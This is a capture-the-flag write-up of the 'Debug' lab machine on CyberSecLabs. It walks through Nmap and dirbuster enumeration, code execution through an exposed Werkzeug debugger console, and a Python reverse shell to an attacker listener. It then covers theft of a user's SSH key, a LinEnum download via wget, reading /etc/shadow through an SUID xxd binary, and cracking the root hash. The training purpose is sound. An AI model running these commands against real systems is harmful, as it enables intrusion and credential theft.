This is my sixth write up and I will be discussing my experience with the machine “Debug” from CyberSecLabs. CyberSecLabs is a great platform for people who are new to penetration testing, or want to boost their skills to take on the OSCP. This machine was listed as a beginner level box and was fairly easy in my opinion. An RCE exploit is discovered with Werkzeug Debugger giving us user. A SUID file is then leveraged with xxd grabbing the shadow file and breaking it with John the Ripper .

Step 1: Enumeration

I started off with two Nmap scans on this machine and stuck with the results from the first scan. My first scan used default scripts -sC and version detection -sV. The second scan gave me the same results and there were only two ports open for this machine so I started off with port 80.

I kicked off dirbuster to see what directories were available. I don't know about you guys but if I see something with the word “console” I am definitely going to start there.

Sure enough this sucker was hosting a Werkzeug Debugger console me to throw some python commands at it. I smelled an RCE the minute I laid eyes on this console so I tested it with a whoami command using python. Sure enough, it spit back at me with the user megan.

Now that I knew this thing was vulnerable I setup a netcat listener on my machine and threw in a python reverse shell command into the Werkzeug Debugger console grabbing the connection back on my machine. Had to cut down the python reverse shell command that I got off of pentestmonkeyby removing the python -c command and single quotes.

On my Kali machine:

nc -lvp 4444

In Werkzeug Debugger console typed this:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("yourip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Connection grabbed from netcat on my kali box

There was a Metasploit module available for this exploit but I wanted to figure this out the manual way for discipline. Not all exploits will have a metasploit module so you have to work with what you got.

In case you were lazy…

So, the shell was horrible on this machine as user. I ran the following commands to get a better shell.

python -c ‘import pty; pty.spawn("/bin/bash")’Ctrl-Z

After you hit Ctrl-Z type the following:

stty raw -echofgexport TERM=xterm

Browsing around I found that Megan has a .ssh directory with her private key id_rsa file exposed. I grabbed the private key and moved it to my machine. This gave me persistence on the server so I wouldn't have to keep rigging my shell. You can either send it back with netcat or just copy and paste the contents into a text file. I chose to be lazy and just copied it into a text editor on my kali machine.

Running ssh2john against it let me know that this key was not password protected. I connected back to the target machine with the following commands where my key was copied. I needed to change the permissions of the file first.

sudo chmod 600 <your key file name here>sudo ssh -i <your key file name here> megan@172.31.1.5

Being back on the target server I pushed a LinEnum script to gather any information leading up to a privilege escalation exploit using a python simple server. You need to be in the same directory where the file you want to server is.

On my Kali box I ran:

python -m SimpleHTTPServer 80

On the target box to grab the file:

wget http://yourip/LinEnum.sh

Now that my file was on the target machine I needed to make it executable then run it with the following commands:

chmod +x LinEnum.sh./LinEnum.sh

Scrolling through the results of the script an interesting SUID file caught my interest with xxd. Did some googling with the keywords “xxd exploit” and found that there is a way to grab the shadow file and extract the hashes using the following command:

xxd "/etc/shadow" | xxd -r

I focused on the root user password hash and copied the value into a text file back on my machine. I ran john the ripper default command which uses a default wordlist against the hash and captured the root password.

Now that I know the password I went back to the target machine and logged in as root with the discovered password using the following command:

su root

Web App Pen Tester 🦇 | https://github.com/SoftwareSinner